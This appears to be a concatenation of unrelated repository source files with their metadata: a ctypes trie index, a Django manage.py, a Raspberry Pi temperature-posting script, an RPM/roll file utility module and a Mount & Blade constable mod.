('next_ptr', ctypes.c_int)
]
def goto(self, char):
idx = CHARSET.index(char)
node_ptr = self.index_ptrs[idx]
if node_ptr:
return BLOCK.pages[node_ptr]
def next(self):
ptr = self.next_ptr
if ptr:
return BLOCK.pages[ptr]
def add_data_ptr(self, data_ptr):
ptrs = self.data_ptrs
for i, p in enumerate(ptrs):
if not p:
break
ptrs[i] = data_ptr
class Pages(ctypes.Array):
_type_ = Page
_length_ = 1000
class Block(ctypes.Structure):
_fields_ = [
('free', ctypes.c_char),
('pages', Pages),
]
@property
def root(self):
return self.pages[0]
def add_page(self, page):
if not self.free:
self.free = 1
self.pages[self.free] = page
BLOCK = None
class FieldIndex(object):
max_depth = 3
def __init__(self, field):
self.field = field
self.model = field.model
self.index_name = '%s.%s.index' % (self.model.name, self.field.name)
# self.init_index()
def create_index(self):
from babu.utils import pack_struct
s = pack_struct(Pages())
block_file = open(self.index_name, 'w')
block_file.write(s)
block_file.close()
def init_index(self):
import mmap
from babu.storage import ProgrammingError
global BLOCK
try:
block_file = open(self.index_name, 'r+b')
except IOError:
raise ProgrammingError
block_buffer = mmap.mmap(block_file.fileno(), 0)
BLOCK = Block.from_buffer(block_buffer)
self.block = BLOCK
def find(self, needle):
node = self.block.root
for char in needle[:self.max_depth]:
node = node.goto(char)
if node is None:
break
if node:
return node.data_ptrs
def add_to_index(self, instance):
value = getattr(instance, self.field.name)
block = self.block
node = block.root
for depth, char in enumerate(value[:self.max_depth]):
_node = node.goto(char)
node.add_data_ptr(instance.pk)
if _node:
node = _node
else:
break
if depth < self.max_depth:
for char in value[depth:self.max_depth]:
page = Page(curr=char, data_ptrs=DataPointerArray(instance.pk))
block.add_page(page)
def remove_from_index(self, instance):
raise NotImplementedError
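# Usage sketch (illustrative, not part of the original module; assumes a
# `field` object exposing `.name` and `.model`, as FieldIndex expects):
#
#     idx = FieldIndex(field)
#     idx.create_index()          # writes '<model>.<field>.index' to disk
#     idx.init_index()            # mmaps the file into the module-level BLOCK
#     idx.add_to_index(instance)  # indexes the first max_depth chars of the value
#     ptrs = idx.find('abc')      # data pointers for values starting with 'abc'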
|
[
"xavier@compile.com"
] |
xavier@compile.com
|
ae07df2f81bfe910c4ffcfe06f600297235bb252
|
c822c6a8941cda6b31b9505372f02b528fed8767
|
/pledge/manage.py
|
4a5058efe7eab9d9020ac60938e874aef65b13ca
|
[] |
no_license
|
asim3/kfupm-pledge
|
b39944c87032325890a1c80ac602bbb12a7e7f58
|
6108a067b225aeeaaff7d82c616099ef5820b3ca
|
refs/heads/main
| 2023-03-08T04:33:28.801450
| 2021-02-17T10:09:45
| 2021-02-17T10:09:45
| 319,908,595
| 0
| 0
| null | 2020-12-19T21:05:44
| 2020-12-09T09:38:57
|
Python
|
UTF-8
|
Python
| false
| false
| 662
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'pledge.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"asimwebapps@gmail.com"
] |
asimwebapps@gmail.com
|
cdbc14cffaa1c039b8eb98564019e47d62004cce
|
df2ee1c167b4bfe492fd1d89ce9790ba467d59f4
|
/getTemp.py
|
330d46ba80ebff7932ee272c9dbdd76b763ddfb8
|
[] |
no_license
|
KamillB/IoTRPI
|
c8eed980162c032f6106fc692e3909baf64dce9c
|
80919742b4e3557c6939513e79bcbbfcb368ec99
|
refs/heads/master
| 2020-03-21T11:08:15.961327
| 2019-01-14T13:02:22
| 2019-01-14T13:02:22
| 138,491,273
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,504
|
py
|
import os
import glob
import time
import json
import requests
import datetime
os.system('modprobe w1-gpio')
os.system('modprobe w1-therm')
base_dir = '/sys/bus/w1/devices/'
device_folder = glob.glob(base_dir + '28*')[0]
device_file = device_folder + '/w1_slave'
url = 'http://192.168.0.112:8080/rpi/temperature'
SLEEP_TIMER = 5
def getserial():
# Extract serial from cpuinfo file
cpuserial = "0000000000000000"
try:
f = open('/proc/cpuinfo','r')
for line in f:
if line[0:6]=='Serial':
cpuserial = line[10:26]
f.close()
except:
cpuserial = "ERROR000000000"
return cpuserial
def read_temp_raw():
f = open(device_file, 'r')
lines = f.readlines()
f.close()
return lines
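# For reference, a DS18B20 exposes two lines in w1_slave (illustrative values):
#   73 01 4b 46 7f ff 0d 10 41 : crc=41 YES
#   73 01 4b 46 7f ff 0d 10 41 t=23187
# read_temp() waits for the CRC 'YES' on line 1, then parses the millidegree
# value after 't=' on line 2 (23187 -> 23.187 C).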
def read_temp():
lines = read_temp_raw()
while lines[0].strip()[-3:] != 'YES':
time.sleep(0.2)
lines = read_temp_raw()
equals_pos = lines[1].find('t=')
if equals_pos != -1:
temp_string = lines[1][equals_pos+2:]
temp_c = float(temp_string) / 1000.0
# temp_f = temp_c * 9.0 / 5.0 + 32.0
# return temp_c, temp_f
return temp_c
while True:
# print(read_temp())
time.sleep(SLEEP_TIMER)
payload = {
"ownerSerialNumber" : getserial(),
"temp" : read_temp(),
"milis" : time.mktime(datetime.datetime.now().timetuple()),
"name" : "first temperature sensor"
}
print(payload)
headers = { 'content-type' : 'application/json' }
response = requests.post(url, data=json.dumps(payload), headers=headers)
|
[
"noreply@github.com"
] |
noreply@github.com
|
61851185d3367e5abccad11fe204de96a2710daf
|
6d309bd5d9ef1aa1d64347bb7964574055514143
|
/src/lm-cmd/lm/file.py
|
0b27028deca078fc3226c3a055b827ebe1269364
|
[] |
no_license
|
pragmagrid/lifemapper-server
|
d8bbfbddd37fa008621996d88dc510f01704ee6b
|
8237262bcefe54acc9479c85344162899689d5c8
|
refs/heads/master
| 2021-05-22T08:20:18.213147
| 2019-12-20T20:25:20
| 2019-12-20T20:25:20
| 17,229,074
| 2
| 3
| null | 2015-12-03T21:31:33
| 2014-02-26T23:07:30
|
Makefile
|
UTF-8
|
Python
| false
| false
| 10,779
|
py
|
#! /opt/rocks/bin/python
import sys
import os
import string
import re
import shutil
import lm.utils
import xml.sax
class File:
def __init__(self, file, timestamp=None, size=None):
# Timestamp and size can be explicitly set for foreign files.
self.setFile(file, timestamp, size)
self.imortal = 0
def __cmp__(self, file):
if self.getBaseName() != file.getBaseName() or \
self.timestamp == file.timestamp:
rc = 0
elif self.timestamp > file.timestamp:
rc = 1
else:
rc = -1
# Override the inequality determination and base the decision
        # on the imortal flag. If both files are divine, then don't
# change anything.
if rc and self.imortal + file.imortal == 1:
if self.imortal:
rc = 1
else:
rc = -1
return rc
def setFile(self, file, timestamp=None, size=None):
self.pathname = os.path.dirname(file)
self.filename = os.path.basename(file)
        # Get the timestamp of the file, or the dereferenced symbolic
# link. If the dereferenced link does not exist set the
# timestamp to zero.
if None not in (timestamp, size):
self.timestamp = timestamp
self.size = size
elif not os.path.islink(file):
self.timestamp = os.path.getmtime(file)
self.size = os.path.getsize(file)
else:
orig = os.readlink(file)
if os.path.isfile(orig):
self.timestamp = os.path.getmtime(orig)
self.size = os.path.getsize(file)
else:
self.timestamp = 0
self.size = 0
def explode(self):
# If the file is a symbolic link to a file, follow the link
        # and copy the file. Links to directories are not expanded.
file = self.getFullName()
if os.path.islink(file):
orig = os.readlink(file)
if os.path.isfile(orig):
os.unlink(file)
shutil.copy2(orig, file)
# Fix the timestamp back to that of
# the original file. The above copy seems
# to do this for us, but I'm going to
# leave this in to make sure it always works.
tm = os.path.getmtime(orig)
os.utime(file, (tm, tm))
def setImortal(self):
self.imortal = 1
def getTimestamp(self):
return self.timestamp
def getSize(self):
return float(self.size) / (1024*1024)
def getUniqueName(self):
return self.filename
def getBaseName(self):
return self.filename
def getName(self):
return self.filename
def getShortName(self):
return os.path.splitext(self.filename)[0]
def getPath(self):
return self.pathname
def getFullName(self):
return str(os.path.join(self.pathname, self.filename))
def symlink(self, target, base=''):
if os.path.isfile(target) or os.path.islink(target):
os.unlink(target)
os.symlink(self.getFullName(), target)
def chmod(self, mode):
if os.path.exists(self.getFullName()):
os.chmod(self.getFullName(), mode)
def dump(self):
print '%s(%s)' % (self.filename, self.pathname)
class RPMBaseFile(File):
def __init__(self, file, timestamp=None, size=None, ext=1):
File.__init__(self, file, timestamp, size)
self.list = []
# Remove ext count extensions, the default is 1, but for
# rolls we remove two (.diskN.iso)
s = self.filename # name-ver-rpmver.arch.rpm
for x in range(0, ext):
i = string.rfind(s, ".")
s = self.filename[:i]
i = string.rfind(s, ".")
self.list.append(s[i+1:]) # get architecture string
s = self.filename[:i]
i = string.rfind(s, "-") # get RPM version string
self.release = s[i+1:]
self.list.append(self.versionList(s[i+1:]))
s = self.filename[:i]
i = string.rfind(s, "-") # get software version string
self.version = s[i+1:]
self.list.append(self.versionList(s[i+1:]))
self.list.append(self.filename[:i]) # get package name
self.list.reverse() # we built the list backwards
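        # Worked example (illustrative): for 'foo-1.2-3.x86_64.rpm' with ext=1
        # the parse yields self.list == ['foo', [[1], [2]], [[3]], 'x86_64'],
        # i.e. [name, version list, release list, arch], with
        # self.version == '1.2' and self.release == '3'.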
def versionList(self, s):
list = []
for e in re.split('\.+|_+', s):
num = ''
alpha = ''
l = []
for c in e:
if c in string.digits:
num = num + c
if alpha:
l.append(alpha)
alpha = ''
else:
alpha = alpha + c
if num:
l.append(string.atoi(num))
num = ''
if alpha:
l.append(alpha)
if num:
l.append(string.atol(num))
list.append(l)
return list
def getBaseName(self):
return self.list[0]
def getUniqueName(self):
return '%s-%s' % (self.list[0], self.list[3])
class RPMFile(RPMBaseFile):
def __init__(self, file, timestamp=None, size=None):
RPMBaseFile.__init__(self, file, timestamp, size)
def __cmp__(self, file):
if self.getPackageArch() != file.getPackageArch():
rc = 0
else:
# For RPM Files, if the timestamps are within 2 minutes
# of each other check
# the Buildtime of the RPM
if abs(int(self.timestamp) - int(file.timestamp)) < 120 :
# print "CMP %s:%s" % (self.getFullName(), file.getFullName())
f1=os.popen("rpm -qp --qf '%%{BUILDTIME}' %s" % self.getFullName())
self.timestamp=float(f1.readline())
f1.close()
f2=os.popen("rpm -qp --qf '%%{BUILDTIME}' %s" % file.getFullName())
file.timestamp=float(f2.readline())
f2.close()
rc = File.__cmp__(self, file)
return rc
def getPackageName(self):
return self.getBaseName()
def getPackageVersion(self):
return self.list[1]
def getPackageRelease(self):
return self.list[2]
def getPackageVersionString(self):
return self.version
def getPackageReleaseString(self):
return self.release
def getPackageArch(self):
return self.list[3]
def installPackage(self, root, flags=""):
"""Installs the RPM at the given root directory. This is
used for patching RPMs into the distribution and making
bootable CDs"""
dbdir = os.path.join(root, 'var', 'lib', 'rpm')
if not os.path.isdir(dbdir):
os.makedirs(dbdir)
cmd = 'rpm -i --nomd5 --force --nodeps --ignorearch ' + \
'--dbpath %s %s ' % (dbdir, flags)
cmd += '--badreloc --relocate /=%s %s' \
% (root, self.getFullName())
print 'cmd', cmd
retval = os.system(cmd)
# Crawl up from the end of the dbdir path and prune off
# all the empty directories.
while dbdir:
if not os.listdir(dbdir):
shutil.rmtree(dbdir)
list = string.split(dbdir, os.sep)
dbdir = string.join(list[:-1], os.sep)
print 'retval', retval
return retval
class RollFile(RPMBaseFile):
def __init__(self, file, timestamp=None, size=None):
RPMBaseFile.__init__(self, file, timestamp, size, 2)
self.diskID = int(string.split(file, '.')[-2][4:])
def __cmp__(self, file):
if self.getRollArch() != file.getRollArch():
rc = 0
else:
rc = File.__cmp__(self, file)
return rc
def getRollDiskID(self):
return self.diskID
def getRollName(self):
return self.getBaseName()
def getRollVersion(self):
return self.list[1]
def getRollRelease(self):
return self.list[2]
def getRollVersionString(self):
return self.version
def getRollReleaseString(self):
return self.release
def getRollArch(self):
return self.list[3]
class RollInfoFile(File,
xml.sax.handler.ContentHandler, xml.sax.handler.DTDHandler,
xml.sax.handler.EntityResolver, xml.sax.handler.ErrorHandler):
def __init__(self, file):
File.__init__(self, file)
self.attrs = {}
parser = xml.sax.make_parser()
parser.setContentHandler(self)
fin = open(file, 'r')
parser.parse(fin)
fin.close()
def startElement(self, name, attrs):
self.attrs[str(name)] = {}
for (attrName, attrVal) in attrs.items():
self.attrs[str(name)][str(attrName)] = str(attrVal)
def getXML(self):
"""Regenerate the XML file based on what was read in and
the current state."""
xml = []
xml.append('<roll name="%s" interface="%s">' %
(self.getRollName(), self.getRollInterface()))
for tag in self.attrs.keys():
if tag == 'roll':
continue
attrs = ''
for key,val in self.attrs[tag].items():
attrs += ' %s="%s"' % (key, val)
xml.append('\t<%s%s/>' % (tag, attrs))
xml.append('</roll>')
return string.join(xml, '\n')
def getRollName(self):
return self.attrs['roll']['name']
def getRollInterface(self):
return self.attrs['roll']['interface']
def getRollVersion(self):
return self.attrs['info']['version']
def getRollRelease(self):
return self.attrs['info']['release']
def setRollOS(self, os):
self.attrs['info']['os'] = os
def getRollOS(self):
try:
return self.attrs['info']['os']
except KeyError:
return 'linux'
def setRollArch(self, arch):
self.attrs['info']['arch'] = arch
def getRollArch(self):
return self.attrs['info']['arch']
def getISOMaxSize(self):
return float(self.attrs['iso']['maxsize'])
def setISOMaxSize(self, size):
self.attrs['iso']['maxsize'] = size
def getISOFlags(self):
return self.attrs['iso']['mkisofs']
def getRollRolls(self):
return self.attrs['rpm']['rolls']
def isBootable(self):
return int(self.attrs['iso']['bootable'])
def hasRolls(self):
if self.attrs['rpm']['rolls'] != '0':
return 1
else:
return 0
def hasRPMS(self):
return int(self.attrs['rpm']['bin'])
def hasSRPMS(self):
return int(self.attrs['rpm']['src'])
class Tree:
def __init__(self, root):
self.root = root
self.tree = {}
self.build('')
def getRoot(self):
return self.root
def getDirs(self):
return self.tree.keys()
def clear(self, path=''):
l1 = string.split(path, os.sep)
for key in self.tree.keys():
l2 = string.split(key, os.sep)
if lm.utils.list_isprefix(l1, l2):
del self.tree[key]
def getFiles(self, path=''):
try:
list = self.tree[path]
except KeyError:
list = []
return list
def setFiles(self, path, files):
self.tree[path] = files
def build(self, dir):
path = os.path.join(self.root, dir)
if not os.path.isdir(path):
return
# Handle the case where we don't have permission to traverse
# into a tree by pruning off the protected sub-tree.
try:
files = os.listdir(path)
except:
files = []
v = []
for f in files:
filepath = os.path.join(path, f)
if os.path.isdir(filepath) and not \
os.path.islink(filepath):
self.build(os.path.join(dir, f))
else:
if re.match('.*\.rpm$', f) != None:
v.append(RPMFile(filepath))
elif re.match('roll-.*\.iso$', f) != None:
v.append(RollFile(filepath))
else:
v.append(File(filepath))
self.tree[dir] = v
def dumpDirNames(self):
for key in self.tree.keys():
print key
def dump(self):
self.apply(self.__dumpIter__)
def apply(self, func, root=None):
for key in self.tree.keys():
for e in self.tree[key]:
func(key, e, root)
def getSize(self):
        'Return the size of the Tree in Mbytes'
len = 0
for key in self.tree.keys():
for file in self.tree[key]:
len = len + file.getSize()
return float(len)
def __dumpIter__(self, path, file, root):
print path,
file.dump()
|
[
"nadya@sdsc.edu"
] |
nadya@sdsc.edu
|
b6c032ceb4d134da7d9a1dd095d343b1f7cb6f23
|
1f5e18ec358e816e045e3f34f453f18adb6401bf
|
/higher_or_lower.py
|
155f5c769928a75f8e9c94090f050af9a3462f94
|
[] |
no_license
|
keerthiballa/PyPart3
|
fcd400755be68364240e6ccf07b2237560e69efa
|
f963df6ef3d3afca4a4213dbe747897217b859e2
|
refs/heads/master
| 2023-08-23T16:20:14.253885
| 2021-10-27T19:27:20
| 2021-10-27T19:27:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,133
|
py
|
"""
Exercise 2
Create a program called higher_or_lower.py
The program must meet the following criteria.
- A function that asks the user to provide a number between 0 and 10.
- A function that returns a random number between 1 and 10.
- A function that evaluates the randomly generated number against the user's guess.
- At the end, the program must output the following:
- The random number that was generated.
- The user's guess.
    - An indication of whether the user guessed correctly or if the user's guess was too high/too low.
Answer below:
"""
"""File named higher_or_lower.py is created separately."""
def guessf():
guess = input('Guess a number between 0 and 10: ')
return int(guess)
def randnumf():
from random import randrange
    return randrange(1, 11)  # 1-10 inclusive, matching the exercise spec
def evaluate():
guess = guessf()
randnum = randnumf()
if guess > randnum:
result='Too High'
elif guess < randnum:
result='Too Low'
else:
result='Equal'
print('The random number was ' + str(randnum))
print('The number guessed was ' + str(guess))
print('Your guess was ' + str(result))
evaluate()
|
[
"keerthiballa@gmail.com"
] |
keerthiballa@gmail.com
|
ffe8e1dbeed117b6d85e0c6d3bbd7dc3c9343227
|
f58600a34c291565c0964e25808169a3e4f6f1b3
|
/testtocompare.py
|
9bf37d76bd2cb474d4e5b3795ab963161496db96
|
[] |
no_license
|
AdamMcWilliam/whosthatpokemon-AudioWaveComparison
|
ed8dcca449c218ceb14099971401c8f0fd3d1fd3
|
1049a3f1de85482ff5075af94a6b26f698542e25
|
refs/heads/master
| 2022-11-16T03:16:42.029390
| 2020-07-06T00:01:53
| 2020-07-06T00:01:53
| 277,403,707
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 480
|
py
|
import matplotlib.pyplot as plt
import numpy as np
import wave
import sys
import os
os.chdir('../../../../Desktop/Pokemon Cries')
spf = wave.open("recorded/output.wav", "r")
# Extract Raw Audio from Wav File
signal = spf.readframes(-1)
signal = np.frombuffer(signal, dtype=np.int16)
#If Stereo
if spf.getnchannels() == 2:
print("Just mono files")
sys.exit(0)
plt.figure(1)
plt.title("Signal Wave...")
plt.plot(signal)
plt.savefig('recorded/test.png')
plt.close()
##plt.show()
|
[
"adammcwilliam@gmail.com"
] |
adammcwilliam@gmail.com
|
4a1f7961b91d92251e807585abeea41d73bea4c2
|
2ac6bb889569759829cc5a2ee9bbb7affdb0bd55
|
/source/constable/__init__.py
|
24b8e7ddd5a3e428eda09f9c0ecfb6073b59cc76
|
[] |
no_license
|
gdwitt/BrytenwaldaReworkedOpenProject
|
434a41d485410c5f8158191aeb0beca4a20ff807
|
41d362b55c643ca74e594151c76095f3bbe938fd
|
refs/heads/master
| 2021-08-27T19:40:42.643671
| 2017-05-29T05:01:51
| 2017-05-29T05:01:51
| 66,900,952
| 0
| 0
| null | 2017-05-29T20:17:51
| 2016-08-30T02:56:15
|
Python
|
UTF-8
|
Python
| false
| false
| 18,217
|
py
|
from source.header_operations import *
from source.header_common import *
from source.header_dialogs import *
from source.header_items import ek_body, ek_foot
from source.header_troops import tf_hero, tf_male, knight_attrib_4, wp
from source.header_skills import *
from source.module_constants import *
from source.statement import StatementBlock
import patrols
import scouts
import recruit
import train
import move_troops
import reports
import release_prisoner
WEEKLY_COST_OF_CONSTABLE = 15
simple_triggers = [
(2, [
(assign, ":has_walled_center", 0),
(try_for_range, ":center_no", centers_begin, centers_end),
(party_get_slot, ":lord_troop_id", ":center_no", "slot_town_lord"),
(eq, ":lord_troop_id", "trp_player"),
(is_between, ":center_no", walled_centers_begin, walled_centers_end),
(assign, ":has_walled_center", 1),
(assign, ":center_no", centers_end),
(try_end),
# todo: confirm that this somehow does not leave traces of the constable. (e.g. trainer, recruiter)
(try_begin),
(eq, ":has_walled_center", 0),
(neq, "$g_player_constable", 0),
(assign, "$g_player_constable", 0),
(try_end),
]),
] \
+ recruit.simple_triggers \
+ scouts.simple_triggers \
+ train.simple_triggers
triggers = [
# create notification to appoint constable
(24, 0, 24 * 13, [], [
(assign, ":has_fief", 0),
(try_for_range, ":center_no", walled_centers_begin, walled_centers_end),
(party_get_slot, ":lord_troop_id", ":center_no", "slot_town_lord"),
(eq, ":lord_troop_id", "trp_player"),
(assign, ":has_fief", 1),
(try_end),
(eq, ":has_fief", 1),
(try_begin),
(eq, "$cheat_mode", 1),
(assign, reg0, "$g_player_constable"),
(display_message, "@{!}DEBUG : constable: {reg0}"),
(try_end),
(assign, ":notification", 0),
(try_begin),
(eq, "$g_player_constable", 0),
(assign, ":notification", 1),
(else_try),
(neq, "$g_player_constable", -1),
(neq, "$g_player_constable", "trp_dplmc_constable"),
(assign, ":notification", 1),
(try_end),
(try_begin),
(eq, ":notification", 1),
(call_script, "script_add_notification_menu", "mnu_dplmc_notification_appoint_constable", 0, 0),
(try_end),
]),
]
menus = [
("dplmc_notification_appoint_constable", 0,
"As a lord of a fief you can now appoint a constable who resides at you court "
"for a weekly salary of %d scillingas. He will recruit new troops and provide "
"information about your army." % WEEKLY_COST_OF_CONSTABLE, "none", [], [
("dplmc_appoint_default", [], "Appoint a prominent nobleman from the area.", [
(call_script, "script_dplmc_appoint_constable"),
(jump_to_menu, "mnu_dplmc_constable_confirm"),
]),
("dplmc_continue", [], "Proceed without constable.", [
(assign, "$g_player_constable", -1),
(assign, "$g_constable_training_center", -1),
(change_screen_return),
]),
]),
("dplmc_constable_confirm", 0,
"Your constable can be found at your court. You should consult him if you "
"want to recruit new troops or get detailed information about your standing army.", "none", [], [
("dplmc_continue", [], "Continue...", [
(change_screen_return),
]),
]),
] \
+ scouts.menus
# this block is added to the enter_court script to add the constable to the scene.
court_visitor = StatementBlock(
(try_begin),
(gt, "$g_player_constable", 0),
# todo: this is wrong: appoint constable should not be here
(call_script, "script_dplmc_appoint_constable"), #fix for wrong troops after update
(party_get_slot, ":town_lord", ":center_no", "slot_town_lord"),
(eq, ":town_lord", "trp_player"),
(set_visitor, ":cur_pos", "$g_player_constable"),
(val_add, ":cur_pos", 1),
(try_end),
)
consequences_give_center = StatementBlock(
(try_begin),
(eq, "$g_constable_training_center", ":center_no"),
(assign, "$g_constable_training_center", -1),
(try_end),
)
consequences_staff_salary = StatementBlock(
(try_begin),
(gt, "$g_player_constable", 0),
(val_add, ":staff_salary", WEEKLY_COST_OF_CONSTABLE),
(try_end),
)
scripts = [
("dplmc_appoint_constable", [
(troop_set_inventory_slot, "trp_dplmc_constable", ek_body, "itm_dplmc_coat_of_plates_red_constable"),
(troop_set_inventory_slot, "trp_dplmc_constable", ek_foot, "itm_leather_boots1"),
(assign, "$g_player_constable", "trp_dplmc_constable"),
]),
] \
+ recruit.scripts \
+ scouts.scripts \
+ move_troops.scripts
# entry point to appoint constable
appoint_dialog_option = \
[anyone|plyr, "dplmc_talk_staff", [
(le, "$g_player_constable", 0),
(assign, ":has_fief", 0),
(try_for_range, ":center_no", walled_centers_begin, walled_centers_end),
(party_get_slot, ":lord_troop_id", ":center_no", "slot_town_lord"),
(eq, ":lord_troop_id", "trp_player"),
(assign, ":has_fief", 1),
(try_end),
(eq, ":has_fief", 1),
], "I want to appoint a constable.", "dplmc_talk_appoint_constable", []
]
dialogs = [
# Appoint constable
[anyone, "dplmc_talk_appoint_constable", [
(troop_slot_ge, "trp_dplmc_constable", "slot_troop_met", 1),
], "I assume you will want to rehire your former constable? "
"His rate is still %d scillingas each week, and the appointment "
"will cost us 20 scillingas." % WEEKLY_COST_OF_CONSTABLE,
"dplmc_talk_appoint_constable_confirm", []
],
[anyone, "dplmc_talk_appoint_constable", [
(is_between, "$g_talk_troop", companions_begin, companions_end),
], "I have heard good things about a local nobleman, and I believe "
"he would be well-suited for the job. He demands %d scillingas "
"each week, though. The appointment will cost us 20 scillingas." % WEEKLY_COST_OF_CONSTABLE,
"dplmc_talk_appoint_constable_confirm", []
],
[anyone, "dplmc_talk_appoint_constable", [],
"That's a wise idea. May I suggest a very capable nobleman and friend of my "
"family? He demands %d scillingas each week, though. The appointment will "
"cost us 20 scillingas." % WEEKLY_COST_OF_CONSTABLE,
"dplmc_talk_appoint_constable_confirm", []
],
[anyone | plyr, "dplmc_talk_appoint_constable_confirm", [
(store_troop_gold, ":gold", "trp_player"),
(ge, ":gold", 20),
], "So be it.", "dplmc_talk_appoint_confirm_yes", [
(call_script, "script_dplmc_appoint_constable"),
(troop_remove_gold, "trp_player", 20),
]],
[anyone | plyr, "dplmc_talk_appoint_constable_confirm", [
(troop_get_slot, ":player_spouse", "trp_player", "slot_troop_spouse"),
(eq, "$g_talk_troop", ":player_spouse"),
], "Maybe later.", "spouse_pretalk", []
],
[anyone | plyr, "dplmc_talk_appoint_constable_confirm", [
(eq, "$g_talk_troop", "$g_player_minister"),
(troop_get_slot, ":player_spouse", "trp_player", "slot_troop_spouse"),
(neq, ":player_spouse", "$g_player_minister"),
], "Maybe later.", "minister_pretalk", []
],
[anyone, "dplmc_talk_appoint_confirm_yes", [
(troop_get_slot, ":player_spouse", "trp_player", "slot_troop_spouse"),
(eq, "$g_talk_troop", ":player_spouse"),
], "I will send him a letter he should arrive at the court soon.", "spouse_pretalk", []
],
[anyone, "dplmc_talk_appoint_confirm_yes", [
(eq, "$g_talk_troop", "$g_player_minister"),
], "I will send him a letter he should arrive at the court soon.", "minister_pretalk", []
],
# Constable actions
[anyone, "start", [
(eq, "$g_player_constable", "$g_talk_troop"),
], "Always at your service!", "dplmc_constable_talk", []
],
[anyone, "dplmc_constable_pretalk", [],
"Do you need anything else, Sire?", "dplmc_constable_talk", []
],
# faith report
[anyone | plyr, "dplmc_constable_talk", [],
"I want a report on the kingdom's faith.", "dplmc_constable_faith", []],
[anyone, "dplmc_constable_faith", [
(assign, reg13, "$g_sod_global_faith"),
], "Due to reports from our kingdom we managed to convert {reg13} people to our faith.",
"dplmc_constable_faith1", []
],
[anyone | plyr, "dplmc_constable_faith1", [],
"It could always be better...", "dplmc_constable_pretalk", []
],
# ask about war
[anyone | plyr, "dplmc_constable_talk", [], "How goes the war?", "dplmc_constable_talk_ask_war",[]],
[anyone, "dplmc_constable_talk_ask_war", [], "{s12}", "dplmc_constable_talk_ask_war_2", [
(assign, ":num_enemies", 0),
(try_for_range_backwards, ":cur_faction", kingdoms_begin, kingdoms_end),
(faction_slot_eq, ":cur_faction", "slot_faction_state", sfs_active),
(store_relation, ":cur_relation", ":cur_faction", "fac_player_supporters_faction"),
(lt, ":cur_relation", 0),
(try_begin),
(eq, ":num_enemies", 0),
(str_store_faction_name_link, s12, ":cur_faction"),
(else_try),
(eq, ":num_enemies", 1),
(str_store_faction_name_link, s11, ":cur_faction"),
(str_store_string, s12, "@{s11} and {s12}"),
(else_try),
(str_store_faction_name_link, s11, ":cur_faction"),
(str_store_string, s12, "@{!}{s11}, {s12}"),
(try_end),
(val_add, ":num_enemies", 1),
(try_end),
(try_begin),
(eq, ":num_enemies", 0),
(str_store_string, s12, "@We are not at war with anyone."),
(else_try),
(str_store_string, s12, "@We are at war with {s12}."),
(try_end),
]],
[anyone | plyr | repeat_for_factions, "dplmc_constable_talk_ask_war_2", [
(store_repeat_object, ":faction_no"),
(is_between, ":faction_no", kingdoms_begin, kingdoms_end),
(faction_slot_eq, ":faction_no", "slot_faction_state", sfs_active),
(store_relation, ":cur_relation", ":faction_no", "fac_player_supporters_faction"),
(lt, ":cur_relation", 0),
(str_store_faction_name, s1, ":faction_no")
], "Tell me more about the war with {s1}.", "dplmc_constable_talk_ask_war_details", [
(store_repeat_object, "$faction_requested_to_learn_more_details_about_the_war_against")
]],
[anyone | plyr, "dplmc_constable_talk_ask_war_2", [], "That's all I wanted to know. Thank you.", "dplmc_constable_pretalk",[]],
[anyone, "dplmc_constable_talk_ask_war_details", [], "{!}{s9}.", "dplmc_constable_talk_ask_war_2", [
(store_add, ":war_damage_slot", "$faction_requested_to_learn_more_details_about_the_war_against", "slot_faction_war_damage_inflicted_on_factions_begin"),
(val_sub, ":war_damage_slot", kingdoms_begin),
(faction_get_slot, ":war_damage_inflicted", "$players_kingdom", ":war_damage_slot"), #Floris 2.52 - Diplo bugfix was "fac_player_supporters_faction"
(store_add, ":war_damage_slot", "$players_kingdom", "slot_faction_war_damage_inflicted_on_factions_begin"), #Floris 2.52 - Diplo bugfix was "fac_player_supporters_faction"
(val_sub, ":war_damage_slot", kingdoms_begin),
(faction_get_slot, ":war_damage_suffered", "$faction_requested_to_learn_more_details_about_the_war_against", ":war_damage_slot"),
(val_max, ":war_damage_suffered", 1),
(store_mul, ":war_damage_ratio", ":war_damage_inflicted", 100),
(val_div, ":war_damage_ratio", ":war_damage_suffered"),
(try_begin),
(eq, "$cheat_mode", 1),
(assign, reg3, ":war_damage_inflicted"),
(assign, reg4, ":war_damage_suffered"),
(assign, reg5, ":war_damage_ratio"),
(display_message, "str_war_damage_inflicted_reg3_suffered_reg4_ratio_reg5"),
(try_end),
(str_store_string, s9, "str_error__did_not_calculate_war_progress_string_properly"),
(try_begin),
(lt, ":war_damage_inflicted", 5),
(str_store_string, s9, "str_the_war_has_barely_begun_so_and_it_is_too_early_to_say_who_is_winning_and_who_is_losing"),
(else_try),
(gt, ":war_damage_inflicted", 100),
(gt, ":war_damage_ratio", 200),
(str_store_string, s9, "str_we_have_been_hitting_them_very_hard_and_giving_them_little_chance_to_recover"),
(else_try),
(gt, ":war_damage_inflicted", 80),
(gt, ":war_damage_ratio", 150),
(str_store_string, s9, "str_the_fighting_has_been_hard_but_we_have_definitely_been_getting_the_better_of_them"),
(else_try),
(gt, ":war_damage_suffered", 100),
(lt, ":war_damage_ratio", 50),
(str_store_string, s9, "str_they_have_been_hitting_us_very_hard_and_causing_great_suffering"),
(else_try),
(gt, ":war_damage_suffered", 80),
(lt, ":war_damage_ratio", 68),
(str_store_string, s9, "str_the_fighting_has_been_hard_and_i_am_afraid_that_we_have_been_having_the_worst_of_it"),
(else_try),
(gt, ":war_damage_suffered", 50),
(gt, ":war_damage_inflicted", 50),
(gt, ":war_damage_ratio", 65),
(str_store_string, s9, "str_both_sides_have_suffered_in_the_fighting"),
(else_try),
(gt, ":war_damage_ratio", 125),
(str_store_string, s9, "str_no_clear_winner_has_yet_emerged_in_the_fighting_but_i_think_we_are_getting_the_better_of_them"),
(else_try),
(gt, ":war_damage_ratio", 80),
